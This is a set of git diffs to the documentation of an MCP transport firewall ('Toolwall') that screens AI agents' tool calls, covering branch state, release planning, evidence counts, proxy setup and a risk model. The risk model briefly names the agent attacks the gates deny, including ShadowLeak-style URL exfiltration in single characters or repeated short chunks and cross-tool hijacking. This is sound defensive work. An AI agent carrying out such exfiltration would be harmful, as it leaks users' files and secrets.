@@ -45,6 +45,7 @@ These PRs are public on GitHub, but they are not merged and they do not change t
   - short-chunk ShadowLeak hardening
   - release-boundary convergence
   - first-read Toolwall cleanup for external review prep
+  - publication-review truth fix for the checked-out branch boundary
 - current local-only packets already include these recent unpublished commits:
   - `1d194f2 test(packaging): Lock packaged install contract`
   - `6d530b6 docs(grounding): reconcile local architecture and current state`
@@ -58,6 +59,7 @@ These PRs are public on GitHub, but they are not merged and they do not change t
   - `d71a736 feat(egress): Harden short-chunk ShadowLeak detection`
   - `dbb35d5 docs(release): Converge local stack for future release boundary`
   - `fa26c69 docs(readme): Clean first-read surface and remove logo`
+  - `06e0245 docs(pr): Final review-readiness fix`
 - separate unpublished local branch: `project/naming-and-ci-discipline` at `ebbdd73`
 
 ## convergence status

--- a/docs/CURRENT_STATE_GROUNDED.md
+++ b/docs/CURRENT_STATE_GROUNDED.md
@@ -29,7 +29,7 @@ These PRs are public on GitHub, but they are not merged and they do not change t
 ## local-only
 
 - checked-out branch: `project/tests-first-quality`
-- the current checked-out tip is local-only and unpublished; re-read `git log --oneline --decorate -n 20` for the exact hash
+- the current checked-out tip is local-only and unpublished; re-read `git log --oneline --decorate -n 30` for the exact hash
 - re-read `git status --short --branch` for the exact ahead count on the current tip
 - the intended local release-candidate boundary should keep a clean working tree
 - current local-only stack already includes:
@@ -43,6 +43,8 @@ These PRs are public on GitHub, but they are not merged and they do not change t
   - durable operator state for secondary surfaces
   - expanded flagship schema coverage
   - short-chunk ShadowLeak hardening
+  - release-boundary convergence
+  - first-read Toolwall cleanup for external review prep
 - current local-only packets already include these recent unpublished commits:
   - `1d194f2 test(packaging): Lock packaged install contract`
   - `6d530b6 docs(grounding): reconcile local architecture and current state`
@@ -54,6 +56,8 @@ These PRs are public on GitHub, but they are not merged and they do not change t
   - `672bf38 feat(state): Persist secondary-surface route registry`
   - `1c05fbd feat(schema): Expand flagship tool contract coverage`
   - `d71a736 feat(egress): Harden short-chunk ShadowLeak detection`
+  - `dbb35d5 docs(release): Converge local stack for future release boundary`
+  - `fa26c69 docs(readme): Clean first-read surface and remove logo`
 - separate unpublished local branch: `project/naming-and-ci-discipline` at `ebbdd73`
 
 ## convergence status
@@ -66,6 +70,7 @@ These PRs are public on GitHub, but they are not merged and they do not change t
 - the secondary HTTP/admin route registry is now restart-durable without broadening the flagship stdio story
 - strict schema coverage expanded only for common safe filesystem sibling tools
 - ShadowLeak detection now blocks repeated short query chunks under one key without widening the safe search/read path
+- the README and first-read repo surface now present `Toolwall` as the display name while keeping `mcp-transport-firewall` as the technical package/install identity
 
 ### still fragmented or intentionally separate
 
@@ -75,7 +80,7 @@ These PRs are public on GitHub, but they are not merged and they do not change t
 
 ### blockers before a meaningful future `2.2.6` discussion
 
-- decide the future push/PR boundary for this current local-only stack
+- use the current checked-out branch as one explicit push/PR review boundary instead of reopening scope with another implementation packet
 - keep `public/current` and `local-only` state explicitly separate in repo and handoff docs
 - either port only the non-renaming workflow hygiene worth carrying forward now, or explicitly defer the rest of the naming branch
 - do not claim exact `2.2.6` contents until that future review boundary exists
@@ -84,7 +89,7 @@ These PRs are public on GitHub, but they are not merged and they do not change t
 
 - `git status --short --branch`
 - `git branch --show-current`
-- `git log --oneline --decorate -n 20`
+- `git log --oneline --decorate -n 30`
 - `npm test`
 - `npm run demo:stdio`
 - `npm run pack:smoke`

--- a/docs/CURRENT_STATE_GROUNDED.md
+++ b/docs/CURRENT_STATE_GROUNDED.md
@@ -29,9 +29,9 @@ These PRs are public on GitHub, but they are not merged and they do not change t
 ## local-only
 
 - checked-out branch: `project/tests-first-quality`
-- `HEAD`: `24e8eb4 docs(examples): Clarify flagship proof path`
-- branch state: ahead of `origin/main` by 6 unpublished commits
-- working tree: clean
+- the current checked-out tip is local-only and unpublished; re-read `git log --oneline --decorate -n 20` for the exact hash
+- re-read `git status --short --branch` for the exact ahead count on the current tip
+- the intended local release-candidate boundary should keep a clean working tree
 - current local-only stack already includes:
   - package install proof
   - grounded docs
@@ -39,27 +39,58 @@ These PRs are public on GitHub, but they are not merged and they do not change t
   - policy/rules hardening
   - benchmark/evidence alignment
   - docs/examples alignment
-- current local-only commits on the checked-out branch:
+  - repo-surface truth-sync
+  - durable operator state for secondary surfaces
+  - expanded flagship schema coverage
+  - short-chunk ShadowLeak hardening
+- current local-only packets already include these recent unpublished commits:
   - `1d194f2 test(packaging): Lock packaged install contract`
   - `6d530b6 docs(grounding): reconcile local architecture and current state`
   - `e076e53 docs(public): sharpen install and workflow proof surface`
   - `46c04db feat(policy): Harden flagship workflow trust rules`
   - `25c1743 docs(evidence): Align benchmark with preflight hardening`
   - `24e8eb4 docs(examples): Clarify flagship proof path`
+  - `8897a6b docs(truth): Sync repo surface with verified local workflow`
+  - `672bf38 feat(state): Persist secondary-surface route registry`
+  - `1c05fbd feat(schema): Expand flagship tool contract coverage`
+  - `d71a736 feat(egress): Harden short-chunk ShadowLeak detection`
 - separate unpublished local branch: `project/naming-and-ci-discipline` at `ebbdd73`
 
-## verified locally in the checked-out branch
+## convergence status
+
+### already coherent in the checked-out branch
+
+- one primary product story: a protected local filesystem/search MCP workflow over `stdio`
+- package install proof, packaged proxy smoke coverage, and repo-local demo proof all exist on the same branch
+- policy hardening, evidence alignment, docs/examples alignment, and runtime truth-sync already landed together in local-only form
+- the secondary HTTP/admin route registry is now restart-durable without broadening the flagship stdio story
+- strict schema coverage expanded only for common safe filesystem sibling tools
+- ShadowLeak detection now blocks repeated short query chunks under one key without widening the safe search/read path
+
+### still fragmented or intentionally separate
+
+- the current local stack is still unpublished local-only work
+- `project/naming-and-ci-discipline` remains a separate hygiene branch and should not be treated as if it already merged into this line
+- workflow display-name and artifact-label renames from that branch are still optional, not part of the current runtime proof
+
+### blockers before a meaningful future `2.2.6` discussion
+
+- decide the future push/PR boundary for this current local-only stack
+- keep `public/current` and `local-only` state explicitly separate in repo and handoff docs
+- either port only the non-renaming workflow hygiene worth carrying forward now, or explicitly defer the rest of the naming branch
+- do not claim exact `2.2.6` contents until that future review boundary exists
+
+## required verification boundary for this local stack
 
 - `git status --short --branch`
 - `git branch --show-current`
 - `git log --oneline --decorate -n 20`
-- `npm run assert:package-metadata`
 - `npm test`
 - `npm run demo:stdio`
-- `npm run pack:dry-run`
 - `npm run pack:smoke`
+- `npm run benchmark:stdio -- --json --output evidence.json`
 
-These checks confirm the current local-only branch behavior. They do not prove push, PR merge, release, or npm publication.
+These checks confirm local branch behavior only. They do not prove push, PR merge, release, or npm publication.
 
 ## Packet Reconciliation
 
@@ -79,13 +110,13 @@ These checks confirm the current local-only branch behavior. They do not prove p
 
 ### Implemented locally, not public
 
-- the full six-commit `project/tests-first-quality` stack listed above
-- naming-and-ci-discipline packet on `project/naming-and-ci-discipline`
+- the current `project/tests-first-quality` local-only stack, including the recent commits listed above
+- the separate workflow-hygiene packet on `project/naming-and-ci-discipline`
 
 ### Planned-only
 
 - `2.2.6` release/tag/publish
-- any future branch-convergence batch that has not landed yet
+- any future push/PR phase that carries this local stack forward
 - optional GitHub metadata cleanup batch from `BD/08-ops/github-metadata-cleanup-candidates.md`
 - any Toolwall display-name rollout beyond planning artifacts
 
@@ -93,7 +124,7 @@ Important reconciliation rule:
 
 - draft PR visibility is not merge or release proof
 - the checked-out branch is the source of truth for local-only behavior
-- `2.2.6` contents remain unconfirmed until a real release candidate exists
+- `2.2.6` contents remain unconfirmed until a real future review boundary exists
 
 ## Docs vs Runtime/Tests
 
@@ -112,9 +143,9 @@ Important reconciliation rule:
 ### reconciled in this packet
 
 - repo docs should describe the packaged embedded server as the fallback downstream target for the default CLI path, not as the default direct CLI path
-- `docs/VERIFICATION_GUIDE.md` now reflects the local verification surface in the checked-out branch
-- that local verification surface includes `scripts/assert-package-metadata.mjs`, expanded install-contract assertions in `tests/release-guardrails.test.ts`, and packaged downstream proof in `tests/package-proxy-smoke.test.ts`
-- GitHub-visible docs can still lag this local grounded packet until it is pushed
+- the checked-out branch now also includes truth-synced repo surfaces, restart-durable secondary route registration, expanded safe schema coverage, and repeated short-chunk ShadowLeak blocking
+- the local verification surface still includes `scripts/assert-package-metadata.mjs`, expanded install-contract assertions in `tests/release-guardrails.test.ts`, and packaged downstream proof in `tests/package-proxy-smoke.test.ts`
+- GitHub-visible docs can still lag this grounded local packet until it is pushed
 
 ### cannot confirm
 

--- a/docs/CURRENT_STATE_GROUNDED.md
+++ b/docs/CURRENT_STATE_GROUNDED.md
@@ -29,19 +29,37 @@ These PRs are public on GitHub, but they are not merged and they do not change t
 ## local-only
 
 - checked-out branch: `project/tests-first-quality`
-- the checked-out branch contains unpublished local work beyond `origin/main`
-- verified P5 code packet commit: `1d194f2 test(packaging): Lock packaged install contract`
-- this grounded-doc reconciliation packet is also local-only until pushed
+- `HEAD`: `24e8eb4 docs(examples): Clarify flagship proof path`
+- branch state: ahead of `origin/main` by 6 unpublished commits
+- working tree: clean
+- current local-only stack already includes:
+  - package install proof
+  - grounded docs
+  - public proof surface
+  - policy/rules hardening
+  - benchmark/evidence alignment
+  - docs/examples alignment
+- current local-only commits on the checked-out branch:
+  - `1d194f2 test(packaging): Lock packaged install contract`
+  - `6d530b6 docs(grounding): reconcile local architecture and current state`
+  - `e076e53 docs(public): sharpen install and workflow proof surface`
+  - `46c04db feat(policy): Harden flagship workflow trust rules`
+  - `25c1743 docs(evidence): Align benchmark with preflight hardening`
+  - `24e8eb4 docs(examples): Clarify flagship proof path`
 - separate unpublished local branch: `project/naming-and-ci-discipline` at `ebbdd73`
 
-## verified locally in the current branch
+## verified locally in the checked-out branch
 
+- `git status --short --branch`
+- `git branch --show-current`
+- `git log --oneline --decorate -n 20`
 - `npm run assert:package-metadata`
 - `npm test`
+- `npm run demo:stdio`
 - `npm run pack:dry-run`
 - `npm run pack:smoke`
 
-These checks confirm the local P5/package-install-proof code packet. They do not prove push, PR merge, release, or npm publication.
+These checks confirm the current local-only branch behavior. They do not prove push, PR merge, release, or npm publication.
 
 ## Packet Reconciliation
 
@@ -61,38 +79,42 @@ These checks confirm the local P5/package-install-proof code packet. They do not
 
 ### Implemented locally, not public
 
+- the full six-commit `project/tests-first-quality` stack listed above
 - naming-and-ci-discipline packet on `project/naming-and-ci-discipline`
-- first tests-first quality packet on `project/tests-first-quality`
 
 ### Planned-only
 
 - `2.2.6` release/tag/publish
-- the next P5 follow-up after the first tests-first packet
+- any future branch-convergence batch that has not landed yet
 - optional GitHub metadata cleanup batch from `BD/08-ops/github-metadata-cleanup-candidates.md`
+- any Toolwall display-name rollout beyond planning artifacts
 
 Important reconciliation rule:
 
-- P1/P2 are not merely planned anymore
-- P3 is not merely planned anymore
-- P4 is not merely planned anymore
-- P5 has already started locally and must be described as local implementation, not as a plan
+- draft PR visibility is not merge or release proof
+- the checked-out branch is the source of truth for local-only behavior
+- `2.2.6` contents remain unconfirmed until a real release candidate exists
 
 ## Docs vs Runtime/Tests
 
 ### confirmed
 
-- `README.md` and `docs/RUNTIME_CONTRACT.md` still match the two-mode runtime shape in the checked-out branch: embedded standalone mode plus downstream stdio proxy mode
-- the code still supports both CLI/env target resolution and the fail-closed gate chain described in the docs
+- the operator-facing CLI path is the stdio proxy from `src/stdio/proxy.ts`
+- when no explicit target is configured, `src/cli-options.ts` falls back to the current package entrypoint with `--embedded-target`
+- the bundled embedded server in `src/embedded/server.ts` exposes `firewall_status` and `firewall_usage`
+- trust gates in `src/stdio/proxy.ts` run in this order:
+  1. auth extraction and scope validation
+  2. color-boundary validation
+  3. AST/egress validation
+  4. preflight validation
+  5. strict schema validation
 
 ### reconciled in this packet
 
+- repo docs should describe the packaged embedded server as the fallback downstream target for the default CLI path, not as the default direct CLI path
 - `docs/VERIFICATION_GUIDE.md` now reflects the local verification surface in the checked-out branch
 - that local verification surface includes `scripts/assert-package-metadata.mjs`, expanded install-contract assertions in `tests/release-guardrails.test.ts`, and packaged downstream proof in `tests/package-proxy-smoke.test.ts`
 - GitHub-visible docs can still lag this local grounded packet until it is pushed
-
-### stale internal planning doc
-
-- `BD/03-current-goals/2026-03-31-next-steps-plan.md` was stale before this grounding pass because it still described P1/P2 as the active local packet and did not reflect that P3/P4 now exist as draft PRs and P5 exists locally
 
 ### cannot confirm
 

--- a/docs/DEMO_RUN_TRANSCRIPT.md
+++ b/docs/DEMO_RUN_TRANSCRIPT.md
@@ -1,8 +1,10 @@
 ## Demo Run Transcript
 
-Command:
+Proof path:
 
 ```powershell
+npm install
+npm run build
 npm run demo:stdio
 ```
 

--- a/docs/EVIDENCE_BUNDLE.md
+++ b/docs/EVIDENCE_BUNDLE.md
@@ -12,7 +12,7 @@ Current local evidence snapshot from the latest validation pass:
 
 - `npm run demo:stdio` passed
 - `npm run benchmark:stdio` passed
-- benchmark totals: `18` cases, `23` requests, `0` false positives, `0` false negatives, `0` cache consistency failures
+- benchmark totals: `19` cases, `24` requests, `0` false positives, `0` false negatives, `0` cache consistency failures
 
 Artifact index:
 
@@ -41,6 +41,7 @@ Expected inspection outcomes:
 
 - read-style allow cases are stable across repeats
 - blocked cases fail with explicit denial codes
+- ShadowLeak evidence includes both single-character and repeated short-chunk URL exfiltration
 - mixed-trust and both default-high-trust plus `blue` preflight failures are visible in the corpus
 - the package surface still matches the documented CLI entry points
 - the packaged install contract is pinned in code and tests

--- a/docs/EVIDENCE_BUNDLE.md
+++ b/docs/EVIDENCE_BUNDLE.md
@@ -2,6 +2,12 @@
 
 This page collects the smallest artifact set needed to inspect the repo without reading every source file first.
 
+If you only want the shortest public proof surface, start here:
+
+1. [README.md](../README.md) for the install path and the repo-local proof path
+2. [docs/DEMO_RUN_TRANSCRIPT.md](DEMO_RUN_TRANSCRIPT.md) for the exact observed demo output
+3. [docs/VERIFICATION_GUIDE.md](VERIFICATION_GUIDE.md) for the deeper verification map
+
 Current local evidence snapshot from the latest validation pass:
 
 - `npm run demo:stdio` passed
@@ -14,6 +20,8 @@ Artifact index:
 |---|---|---|
 | benchmark JSON snapshot | `docs/STDIO_BENCHMARK_SNAPSHOT.json` | `npm run benchmark:stdio -- --json --output evidence.json` |
 | stdio demo transcript | `docs/DEMO_RUN_TRANSCRIPT.md` | `npm run demo:stdio` |
+| package install contract | `scripts/assert-package-metadata.mjs` + `tests/release-guardrails.test.ts` | `npm run assert:package-metadata` + `npm test` |
+| packaged proxy proof | `tests/package-proxy-smoke.test.ts` | `npm run pack:smoke` |
 | architecture diagram | `docs/ARCHITECTURE.md` | tracked file |
 | client config guide | `docs/CLIENT_CONFIG_EXAMPLES.md` | tracked file |
 | runtime contract | `docs/RUNTIME_CONTRACT.md` | tracked file |
@@ -35,6 +43,7 @@ Expected inspection outcomes:
 - blocked cases fail with explicit denial codes
 - mixed-trust and preflight failures are visible in the corpus
 - the package surface still matches the documented CLI entry points
+- the packaged install contract is pinned in code and tests
 - the client config guide matches the current package behavior
 - the runtime contract matches the current denial semantics
 - enforcement claims stay separate from limits

--- a/docs/EVIDENCE_BUNDLE.md
+++ b/docs/EVIDENCE_BUNDLE.md
@@ -12,7 +12,7 @@ Current local evidence snapshot from the latest validation pass:
 
 - `npm run demo:stdio` passed
 - `npm run benchmark:stdio` passed
-- benchmark totals: `17` cases, `22` requests, `0` false positives, `0` false negatives, `0` cache consistency failures
+- benchmark totals: `18` cases, `23` requests, `0` false positives, `0` false negatives, `0` cache consistency failures
 
 Artifact index:
 
@@ -41,7 +41,7 @@ Expected inspection outcomes:
 
 - read-style allow cases are stable across repeats
 - blocked cases fail with explicit denial codes
-- mixed-trust and preflight failures are visible in the corpus
+- mixed-trust and both default-high-trust plus `blue` preflight failures are visible in the corpus
 - the package surface still matches the documented CLI entry points
 - the packaged install contract is pinned in code and tests
 - the client config guide matches the current package behavior

--- a/docs/LIMITS_AND_NON_GOALS.md
+++ b/docs/LIMITS_AND_NON_GOALS.md
@@ -7,6 +7,7 @@ Current limits:
 - the shared-secret auth envelope is not cryptographic attestation
 - the current egress gate is recursive string inspection, not a full parser
 - cache behavior is optimized for allowlisted read-style tools only
+- this repository is not presented as a broad MCP platform or hosted control plane
 
 Non-goals:
 

--- a/docs/NEXT_BATCH_RECOMMENDATION.md
+++ b/docs/NEXT_BATCH_RECOMMENDATION.md
@@ -4,28 +4,45 @@ Updated: 2026-04-02
 
 ## Chosen Batch
 
-Name: `branch convergence and repo-surface coherence`
+Name: `future push/PR readiness from the converged local stack`
 
 ## Why This Is The Best ROI
 
-- the checked-out branch already contains the current local-only proof stack:
+- the checked-out branch already carries the meaningful local-only stack:
   - package install proof
   - grounded docs
   - public proof surface
   - policy/rules hardening
   - benchmark/evidence alignment
   - docs/examples alignment
-- the highest remaining risk is fragmented truth across `project/tests-first-quality`, `project/naming-and-ci-discipline`, and the existing draft PR lines
-- another isolated docs-only or packaging-only packet would add more surface area without reducing that fragmentation
-- the next meaningful release discussion should sit on one coherent branch, not on scattered local and draft packets
+  - repo-surface truth-sync
+  - durable operator state for secondary surfaces
+  - expanded flagship schema coverage
+  - short-chunk ShadowLeak hardening
+- after the current convergence refresh, the remaining risk is publication sequencing and truth maintenance, not another missing runtime capability
+- another isolated hardening or docs-only packet would mostly re-fragment a branch that is now close to one reviewable boundary
+- the next meaningful `2.2.6` discussion should start from a future push/PR boundary around this stack, not from mixed local and draft surfaces
 
-## Recommended Scope
+## Recommended Scope For The Next Phase
 
-- decide how `project/tests-first-quality` should converge with `project/naming-and-ci-discipline`
-- carry over only the low-risk subset that improves repo truth without renaming package, repo, bin, or env vars
+- open a future push/PR phase around `project/tests-first-quality` or a direct descendant
 - keep README, runtime docs, and proof docs centered on one local filesystem/search stdio workflow
-- keep `Toolwall` as display/planning only until a later display-copy batch
-- avoid new runtime features unless a factual fix is required
+- keep `Toolwall` as display/planning only until a later deliberate display-copy batch
+- carry over only non-renaming workflow hygiene if it clearly improves coherence more than churn
+- avoid new runtime features unless a factual correctness fix appears
+
+## Exact Blockers Before That Phase
+
+- the current local stack is still unpublished local-only work
+- `public/current` remains `2.2.5` while this branch still sits ahead of public `main`
+- the separate workflow hygiene branch must not be mistaken for merged current state
+- exact `2.2.6` contents should stay unclaimed until the future review boundary exists
+
+## Recommendation On `project/naming-and-ci-discipline`
+
+- take now: only the `package-smoke.yml` action-runtime bump to `actions/checkout@v6` and `actions/setup-node@v6`, because it removes the known non-blocking warning source without renaming workflows or evidence artifacts
+- defer: workflow display-name changes and the benchmark artifact rename to a later explicit CI naming batch
+- never by default: package, repo, CLI/bin, env-var, or evidence-surface renames from that line
 
 ## Why The Other Top 2 Options Lose
 

--- a/docs/NEXT_BATCH_RECOMMENDATION.md
+++ b/docs/NEXT_BATCH_RECOMMENDATION.md
@@ -1,0 +1,34 @@
+# Next Batch Recommendation
+
+Updated: 2026-04-02
+
+## Chosen Batch
+
+Name: `package install proof`
+
+## Why This Is The Best ROI
+
+- this docs-only grounding commit does not replace the next implementation batch; it only records the current local truth around it
+- it extends the only active local quality packet already on the checked-out branch
+- it hardens the boundary between repo state and the actual npm artifact, which is still the most expensive place to regress before `2.2.6`
+- it improves confidence for every other queued public-facing packet because README/support/runtime wording is safer to publish when the packaged install path is harder to break
+- it adds value without creating another public draft branch immediately
+
+## Recommended Scope
+
+- continue the current P5 line from package metadata guardrails and tarball proxy smoke
+- add source-install and entrypoint proof where the packaged surface is still under-specified
+- add only the remaining high-value proxy/trust-gate proofs that exercise the real packaged boundary
+- keep the batch focused on tests, scripts, and tight doc alignment
+
+## Why The Other Top 2 Options Lose
+
+### 1. workflow proof publication
+
+- strong user-facing value, but the core packet already exists as draft PR `#53`
+- publishing more top-layer proof before the packaged install boundary is tighter increases story polish faster than delivery confidence
+
+### 2. support surface cleanup
+
+- useful for intake hygiene, but support wording is secondary to making the shipped package harder to regress
+- the packet already exists as draft PR `#52`, so its marginal ROI is lower than finishing the active local quality line

--- a/docs/NEXT_BATCH_RECOMMENDATION.md
+++ b/docs/NEXT_BATCH_RECOMMENDATION.md
@@ -4,31 +4,37 @@ Updated: 2026-04-02
 
 ## Chosen Batch
 
-Name: `package install proof`
+Name: `branch convergence and repo-surface coherence`
 
 ## Why This Is The Best ROI
 
-- this docs-only grounding commit does not replace the next implementation batch; it only records the current local truth around it
-- it extends the only active local quality packet already on the checked-out branch
-- it hardens the boundary between repo state and the actual npm artifact, which is still the most expensive place to regress before `2.2.6`
-- it improves confidence for every other queued public-facing packet because README/support/runtime wording is safer to publish when the packaged install path is harder to break
-- it adds value without creating another public draft branch immediately
+- the checked-out branch already contains the current local-only proof stack:
+  - package install proof
+  - grounded docs
+  - public proof surface
+  - policy/rules hardening
+  - benchmark/evidence alignment
+  - docs/examples alignment
+- the highest remaining risk is fragmented truth across `project/tests-first-quality`, `project/naming-and-ci-discipline`, and the existing draft PR lines
+- another isolated docs-only or packaging-only packet would add more surface area without reducing that fragmentation
+- the next meaningful release discussion should sit on one coherent branch, not on scattered local and draft packets
 
 ## Recommended Scope
 
-- continue the current P5 line from package metadata guardrails and tarball proxy smoke
-- add source-install and entrypoint proof where the packaged surface is still under-specified
-- add only the remaining high-value proxy/trust-gate proofs that exercise the real packaged boundary
-- keep the batch focused on tests, scripts, and tight doc alignment
+- decide how `project/tests-first-quality` should converge with `project/naming-and-ci-discipline`
+- carry over only the low-risk subset that improves repo truth without renaming package, repo, bin, or env vars
+- keep README, runtime docs, and proof docs centered on one local filesystem/search stdio workflow
+- keep `Toolwall` as display/planning only until a later display-copy batch
+- avoid new runtime features unless a factual fix is required
 
 ## Why The Other Top 2 Options Lose
 
-### 1. workflow proof publication
+### 1. broader display-name rollout
 
-- strong user-facing value, but the core packet already exists as draft PR `#53`
-- publishing more top-layer proof before the packaged install boundary is tighter increases story polish faster than delivery confidence
+- `Toolwall` is still a planning/display boundary, not a technical identity migration
+- broader naming rollout before branch convergence would add churn faster than clarity
 
-### 2. support surface cleanup
+### 2. monetization or audience-growth work
 
-- useful for intake hygiene, but support wording is secondary to making the shipped package harder to regress
-- the packet already exists as draft PR `#52`, so its marginal ROI is lower than finishing the active local quality line
+- repo truth and branch coherence still come first
+- pushing growth or monetization on top of mixed local, draft, and public state would amplify confusion instead of trust

--- a/docs/NEXT_BATCH_RECOMMENDATION.md
+++ b/docs/NEXT_BATCH_RECOMMENDATION.md
@@ -4,7 +4,7 @@ Updated: 2026-04-02
 
 ## Chosen Batch
 
-Name: `future push/PR readiness from the converged local stack`
+Name: `publication review from the converged local stack`
 
 ## Why This Is The Best ROI
 
@@ -19,13 +19,13 @@ Name: `future push/PR readiness from the converged local stack`
   - durable operator state for secondary surfaces
   - expanded flagship schema coverage
   - short-chunk ShadowLeak hardening
-- after the current convergence refresh, the remaining risk is publication sequencing and truth maintenance, not another missing runtime capability
+- after the current convergence refresh and first-read Toolwall cleanup, the remaining risk is publication sequencing and truth maintenance, not another missing runtime capability
 - another isolated hardening or docs-only packet would mostly re-fragment a branch that is now close to one reviewable boundary
-- the next meaningful `2.2.6` discussion should start from a future push/PR boundary around this stack, not from mixed local and draft surfaces
+- the next meaningful `2.2.6` discussion should start from external review on this exact branch boundary, not from mixed local and draft surfaces
 
 ## Recommended Scope For The Next Phase
 
-- open a future push/PR phase around `project/tests-first-quality` or a direct descendant
+- publish `project/tests-first-quality` itself for external review
 - keep README, runtime docs, and proof docs centered on one local filesystem/search stdio workflow
 - keep `Toolwall` as display/planning only until a later deliberate display-copy batch
 - carry over only non-renaming workflow hygiene if it clearly improves coherence more than churn
@@ -49,7 +49,7 @@ Name: `future push/PR readiness from the converged local stack`
 ### 1. broader display-name rollout
 
 - `Toolwall` is still a planning/display boundary, not a technical identity migration
-- broader naming rollout before branch convergence would add churn faster than clarity
+- broader naming rollout before publication review would add churn faster than clarity
 
 ### 2. monetization or audience-growth work
 

--- a/docs/PROXY_SETUP.md
+++ b/docs/PROXY_SETUP.md
@@ -3,11 +3,32 @@
 Use this page when you want the firewall in front of a local read/search-shaped downstream MCP server.
 The primary fit is an individual Codex or Claude Code operator protecting a risky local MCP workflow.
 
-Primary proof path:
+## Canonical install path
+
+Use protected downstream proxy mode as the default integration path:
+
+```json
+{
+  "mcpServers": {
+    "protected-local-tooling": {
+      "command": "npx",
+      "args": ["-y", "mcp-transport-firewall"],
+      "env": {
+        "PROXY_AUTH_TOKEN": "replace-with-32-byte-secret",
+        "MCP_TARGET_COMMAND": "node",
+        "MCP_TARGET_ARGS_JSON": "[\"C:/absolute/path/to/your-mcp-server.js\"]"
+      }
+    }
+  }
+}
+```
+
+Use `PROXY_AUTH_TOKEN` for fail-closed auth, and prefer `MCP_TARGET_COMMAND` plus `MCP_TARGET_ARGS_JSON` for the downstream target.
+
+## Canonical proof path
 
 ```bash
 npm install
-npm --prefix ui install
 npm run build
 npm run demo:stdio
 ```
@@ -29,9 +50,13 @@ What this proves:
 - the `fetch_url` exfiltration sample is denied before downstream execution
 - the missing-auth sample is denied at the transport boundary
 
+The proof path uses `examples/demo-target.js` as a reproducible downstream target. It demonstrates a protected local filesystem/search-style workflow without claiming to be a full filesystem MCP server.
+
 After the proof:
 
 ```bash
+npm run assert:package-metadata
+npm test
 npm run verify:all
 npm run benchmark:stdio -- --json --output evidence.json
 npm run pack:dry-run
@@ -53,32 +78,6 @@ curl http://localhost:9090/metrics
 ```
 
 The Docker path is useful for observability and packaging validation. The stdio path stays the main proof of transport-boundary enforcement.
-
-Supported CLI entry points:
-
-```bash
-npx -y mcp-transport-firewall
-npx -y mcp-transport-firewall --help
-npm install -g mcp-transport-firewall
-```
-
-Recommended client configuration:
-
-```json
-{
-  "mcpServers": {
-    "protected-local-tooling": {
-      "command": "npx",
-      "args": ["-y", "mcp-transport-firewall"],
-      "env": {
-        "PROXY_AUTH_TOKEN": "replace-with-32-byte-secret",
-        "MCP_TARGET_COMMAND": "node",
-        "MCP_TARGET_ARGS_JSON": "[\"C:/absolute/path/to/your-mcp-server.js\"]"
-      }
-    }
-  }
-}
-```
 
 If you need a self-contained MCP server without a downstream target, standalone bundled mode is still available through `npx -y mcp-transport-firewall`.
 

--- a/docs/PROXY_SETUP.md
+++ b/docs/PROXY_SETUP.md
@@ -80,6 +80,6 @@ curl http://localhost:9090/metrics
 
 The Docker path is useful for observability and packaging validation. The stdio path stays the main proof of transport-boundary enforcement.
 
-If you need a self-contained MCP server without a downstream target, standalone bundled mode is still available through `npx -y mcp-transport-firewall`.
+If you need the packaged status tools without configuring another downstream target, `npx -y mcp-transport-firewall` falls back to the bundled `--embedded-target` path behind the same stdio boundary.
 
 If you want help getting from the demo path to a real protected workflow, use [Guided setup and audits](GUIDED_SETUP_AND_AUDITS.md).

--- a/docs/PROXY_SETUP.md
+++ b/docs/PROXY_SETUP.md
@@ -1,7 +1,9 @@
 ## Proxy Setup
 
+`Toolwall` is the display name on the repo surface. The installable package and CLI entrypoint stay `mcp-transport-firewall`.
+
 Use this page when you want the firewall in front of a local read/search-shaped downstream MCP server.
-The primary fit is an individual Codex or Claude Code operator protecting a risky local MCP workflow.
+The main fit is one protected local filesystem/search workflow over `stdio`.
 
 ## Canonical install path
 
@@ -81,5 +83,3 @@ curl http://localhost:9090/metrics
 The Docker path is useful for observability and packaging validation. The stdio path stays the main proof of transport-boundary enforcement.
 
 If you need the packaged status tools without configuring another downstream target, `npx -y mcp-transport-firewall` falls back to the bundled `--embedded-target` path behind the same stdio boundary.
-
-If you want help getting from the demo path to a real protected workflow, use [Guided setup and audits](GUIDED_SETUP_AND_AUDITS.md).

--- a/docs/PROXY_SETUP.md
+++ b/docs/PROXY_SETUP.md
@@ -51,6 +51,7 @@ What this proves:
 - the missing-auth sample is denied at the transport boundary
 
 The proof path uses `examples/demo-target.js` as a reproducible downstream target. It demonstrates a protected local filesystem/search-style workflow without claiming to be a full filesystem MCP server.
+The short demo intentionally stays on the safe `search_files` path; default-high-trust preflight denials are covered by the benchmark corpus and snapshot.
 
 After the proof:
 

--- a/docs/RISK_MODEL.md
+++ b/docs/RISK_MODEL.md
@@ -38,7 +38,7 @@ This includes indirect prompt-injection traffic only to the extent that it appea
 | `nhi-auth-validator` | Is the caller carrying the expected shared secret and declared scopes? | deny request |
 | `scope-validator` | Is the requested tool inside the declared scope set? | deny request |
 | `color-boundary` | Does the request mix incompatible trust domains or flip an established session color? | deny request |
-| `preflight-validator` | Does a high-trust (`blue`) action carry a valid one-time preflight ID? | deny request |
+| `preflight-validator` | Does an explicit or default high-trust action carry a valid one-time preflight ID? | deny request |
 | `schema-validator` | Do registered tool arguments match a strict contract? | deny request |
 | `ast-egress-filter` | Do request strings match exfiltration, sensitive-path, shell-injection, or epistemic-risk markers? | deny request |
 

--- a/docs/RISK_MODEL.md
+++ b/docs/RISK_MODEL.md
@@ -51,7 +51,7 @@ All gates fail closed. If validation cannot be completed, the request is rejecte
 | mixed trust domains / cross-tool hijack | `color-boundary` | `tests/color-boundary.test.ts` |
 | missing or replayed approval for high-trust actions | `preflight-validator` | `tests/preflight-validator.test.ts` |
 | undeclared or schema-smuggled arguments | `schema-validator` | `tests/schema-validator.test.ts` |
-| ShadowLeak-style URL exfiltration | `ast-egress-filter` | `tests/ast-egress-filter.test.ts`, `tests/cli.test.ts` |
+| ShadowLeak-style URL exfiltration, including repeated short chunks under one query key | `ast-egress-filter` | `tests/ast-egress-filter.test.ts`, `tests/cli.test.ts`, `examples/evidence-corpus.json` |
 | sensitive-path access markers | `ast-egress-filter` | `tests/ast-egress-filter.test.ts`, `examples/evidence-corpus.json` |
 | shell-injection markers in tool arguments | `ast-egress-filter` | `tests/ast-egress-filter.test.ts`, `examples/evidence-corpus.json` |
 | unsafe response material flowing back to the caller | response sanitization | `src/proxy/shadow-leak-sanitizer.ts`, `tests/app.test.ts` |

--- a/docs/RUNTIME_CONTRACT.md
+++ b/docs/RUNTIME_CONTRACT.md
